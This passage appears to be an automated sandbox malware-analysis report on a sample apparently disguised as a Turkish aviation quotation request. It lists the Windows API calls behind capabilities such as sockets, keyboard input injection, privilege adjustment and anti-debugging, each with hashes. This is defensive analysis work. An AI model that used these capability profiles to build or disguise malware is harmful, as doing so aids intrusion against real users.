                                                                                                                                    • Instruction Fuzzy Hash: C8417C7194420EABCF14EF64C889BEEBBB8EF15310F244056E915A6191EB309F84CFA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4100e14100514100514100d14100c14100214100c14100814100014100014100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                    • API String ID: 0-3612016274
                                                                                                                                    • Opcode ID: 369587ffdfd2c7399f5f00952b872b793500e70f788e92d59c2c86ad808a465a
                                                                                                                                    • Instruction ID: a72e206837abffd59cdbaa8873cc7cb326fa7adc14bbad563a03d210336ba2c8
                                                                                                                                    • Opcode Fuzzy Hash: 369587ffdfd2c7399f5f00952b872b793500e70f788e92d59c2c86ad808a465a
                                                                                                                                    • Instruction Fuzzy Hash: 15A27071E0061ACBDF28DF58C940BADB7B2BF64314F6581A9E815A7285EB70DE81CF50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00199A4E
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00199B23
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00199B36
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$LongProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3131106179-0
                                                                                                                                    • Opcode ID: 88274ec89b2c551a81b534f97259713c9ee1c34d2fd7746c70ba15efe64dd483
                                                                                                                                    • Instruction ID: d67577f07338af63a793e5be7cb1fe33472081ab8d7a4a8d5c53dbffce310f4b
                                                                                                                                    • Opcode Fuzzy Hash: 88274ec89b2c551a81b534f97259713c9ee1c34d2fd7746c70ba15efe64dd483
                                                                                                                                    • Instruction Fuzzy Hash: 2EA10270208504BFEF28AA2C9C9DEBB3A9DEB56300B16420EF502D76D1EB259D51C676
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0020304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
                                                                                                                                      • Part of subcall function 0020304E: _wcslen.LIBCMT ref: 0020309B
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0020185D
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201884
                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 002018DB
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 002018E6
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00201915
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                    • Opcode ID: 81b7eb8df0c060e2f36d4e28304854e31995127922fcf1f1528fc67a3a9358e7
                                                                                                                                    • Instruction ID: b394a3b7251bd850423dacaf107e77161ff2e0058e49a589a2c1bf3ae76c4375
                                                                                                                                    • Opcode Fuzzy Hash: 81b7eb8df0c060e2f36d4e28304854e31995127922fcf1f1528fc67a3a9358e7
                                                                                                                                    • Instruction Fuzzy Hash: 10519275A00200AFEB11AF24D88AF6A77E5AB54718F14C09CFA155F3D3C771AE518BA1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                    • Opcode ID: 280d0305e706ad7b1af06eee081f725634e5d7cab1c1ecf8cca5b7c665832997
                                                                                                                                    • Instruction ID: e210b6ffe89eaba7ce7b137bfbcf196c60141aed2262bd87a45c498329b68325
                                                                                                                                    • Opcode Fuzzy Hash: 280d0305e706ad7b1af06eee081f725634e5d7cab1c1ecf8cca5b7c665832997
                                                                                                                                    • Instruction Fuzzy Hash: FE21F9317902015FD7208F1AD844B9A7BE5EFA5314F28806DE945CB351CB71DCA2CBD1
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001E82AA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen
                                                                                                                                    • String ID: ($tb$$|
                                                                                                                                    • API String ID: 1659193697-4150371503
                                                                                                                                    • Opcode ID: 007a5b71ee376f31a9f556a1fc8cea6d29f83e0403e51f0b9e9fe84c99c13fc9
                                                                                                                                    • Instruction ID: a4c828f95b293aac8a4fd7b15375189c2f9726a512a4ef667beb760213ffb1af
                                                                                                                                    • Opcode Fuzzy Hash: 007a5b71ee376f31a9f556a1fc8cea6d29f83e0403e51f0b9e9fe84c99c13fc9
                                                                                                                                    • Instruction Fuzzy Hash: 95322774A00B459FCB28CF59C481A6AB7F1FF48710B15C56EE59ADB3A1EB70E981CB40
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0020A6AC
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0020A6BA
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0020A79C
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020A7AB
                                                                                                                                      • Part of subcall function 0019CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,001C3303,?), ref: 0019CE8A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                    • Opcode ID: d8b6292858a820f81ead60c6b9a6b32ddeb789a7e4faaedd133306666b65c30b
                                                                                                                                    • Instruction ID: 09fbcee08b1a410ac47121f88b69997bb4c90d5556275d40729c4f2f48899f3b
                                                                                                                                    • Opcode Fuzzy Hash: d8b6292858a820f81ead60c6b9a6b32ddeb789a7e4faaedd133306666b65c30b
                                                                                                                                    • Instruction Fuzzy Hash: 8B512D71508311AFD710EF24D886A6BBBE8FF99754F40891DF58997292EB30DA04CF92
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001EAAAC
                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 001EAAC8
                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001EAB36
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001EAB88
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: 0d1760404f281b3e62ac1689501df7cefdef98a5deb8a2f29d341d14400e495a
                                                                                                                                    • Instruction ID: 723985e74fb5c878c7f2ac180756ecbd099f1ba0d34544b982456ea648a210d2
                                                                                                                                    • Opcode Fuzzy Hash: 0d1760404f281b3e62ac1689501df7cefdef98a5deb8a2f29d341d14400e495a
                                                                                                                                    • Instruction Fuzzy Hash: 1B314C30A80BC8AEFF34CB66CC05BFE77AAAF54310F94421AF581961D0D774A985C762
                                                                                                                                    APIs
                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 001FCE89
                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001FCEEA
                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 001FCEFE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                    • Opcode ID: 7ef66ca697c6d20ace8c07bd77fefb099f7c3f9abbcfd479ae47e75f26f2f302
                                                                                                                                    • Instruction ID: c6c98f0329d69cdab6ca791a31d29d14ae0edd3f1f06b299f6956e80f63e8215
                                                                                                                                    • Opcode Fuzzy Hash: 7ef66ca697c6d20ace8c07bd77fefb099f7c3f9abbcfd479ae47e75f26f2f302
                                                                                                                                    • Instruction Fuzzy Hash: 3B21ACB554070D9BDB20CF65DA48BA6BBF8EB51314F20841AE64692152EB70EA04ABA0
                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 001B271A
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001B2724
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 001B2731
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                    • Opcode ID: c64c504ac15165c7c096322021e05f125bc1801d4113bbe7779b77919ef9c8a7
                                                                                                                                    • Instruction ID: 7aa101c0cb5b4b08120874954da9f86d5dff0f4886abb6edc87e496668c3c8b4
                                                                                                                                    • Opcode Fuzzy Hash: c64c504ac15165c7c096322021e05f125bc1801d4113bbe7779b77919ef9c8a7
                                                                                                                                    • Instruction Fuzzy Hash: 4731D5749412289BCB21DF68DC887DCB7B8BF18310F5041EAE81CA7261EB309F858F44
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001F51DA
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001F5238
                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 001F52A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                    • Opcode ID: 3f3421bd45defc52b201660972736ebbaf415c5006ec12faf9443bad80416b55
                                                                                                                                    • Instruction ID: 36ebe8e2457f9cd431d89bd3f8ef8e7fcb54009e98a29f32058c4685eb357fbb
                                                                                                                                    • Opcode Fuzzy Hash: 3f3421bd45defc52b201660972736ebbaf415c5006ec12faf9443bad80416b55
                                                                                                                                    • Instruction Fuzzy Hash: B9318175A00508DFDB00DF54D888EADBBB5FF09318F188099E909AB352CB31E945CFA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0019FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001A0668
                                                                                                                                      • Part of subcall function 0019FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001A0685
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
                                                                                                                                    • GetLastError.KERNEL32 ref: 001E174A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                    • Opcode ID: c0e1adb7f7f376700a4e8c784477d0383de38b49b12f29be8dc28026d3f16bb1
                                                                                                                                    • Instruction ID: 7191f583dd81a87cd517fe747df65336071576b1f44bba1018fb2c040c4b78e9
                                                                                                                                    • Opcode Fuzzy Hash: c0e1adb7f7f376700a4e8c784477d0383de38b49b12f29be8dc28026d3f16bb1
                                                                                                                                    • Instruction Fuzzy Hash: 6C1191B2814704BFD7189F54EC86DAFB7F9EB48B14B20852EE05697641EB70BC41CA20
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001ED608
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001ED645
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001ED650
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                    • Opcode ID: 79a88f500601de242db829c531886a55f89a62bad903d9698cc2cd5b56392cd6
                                                                                                                                    • Instruction ID: 1c4c6098212aadc7ea0ad1c0dcb2d1551cfcce769aba1d67dc4591d980cb11e5
                                                                                                                                    • Opcode Fuzzy Hash: 79a88f500601de242db829c531886a55f89a62bad903d9698cc2cd5b56392cd6
                                                                                                                                    • Instruction Fuzzy Hash: E5117C75E41228BBDB108F95AC48FEFBBBCEB49B50F108111F914E7290C6704A018BA1
                                                                                                                                    APIs
                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001E168C
                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001E16A1
                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 001E16B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                    • Opcode ID: 2076edca5c3226a2498cfb403281cb2a5c4b7340093ae3ed6745e051214ce2c2
                                                                                                                                    • Instruction ID: 631b1fa67918001e7af65149d87ebd9d54c7c3742796dde18c712c80998a428a
                                                                                                                                    • Opcode Fuzzy Hash: 2076edca5c3226a2498cfb403281cb2a5c4b7340093ae3ed6745e051214ce2c2
                                                                                                                                    • Instruction Fuzzy Hash: E6F0F475990309FBDB00DFE49C89EAEBBBCFB08604F508565E501E2181E774AA448A50
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000,?,001B28E9), ref: 001A4D09
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000,?,001B28E9), ref: 001A4D10
                                                                                                                                    • ExitProcess.KERNEL32 ref: 001A4D22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                    • Opcode ID: 78694d6921f33ac3b3e456f51127eda8d3f441c9e221c4fab5db1700e141c3c4
                                                                                                                                    • Instruction ID: d98caa34f829828da21a9003fbf2637e9e4f7ef323963052f04a621388e07158
                                                                                                                                    • Opcode Fuzzy Hash: 78694d6921f33ac3b3e456f51127eda8d3f441c9e221c4fab5db1700e141c3c4
                                                                                                                                    • Instruction Fuzzy Hash: ADE0B639040248ABCF11AF94ED0DA987B69EBA6785B208054FD198A122DB75DE52CA80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: /
                                                                                                                                    • API String ID: 0-2043925204
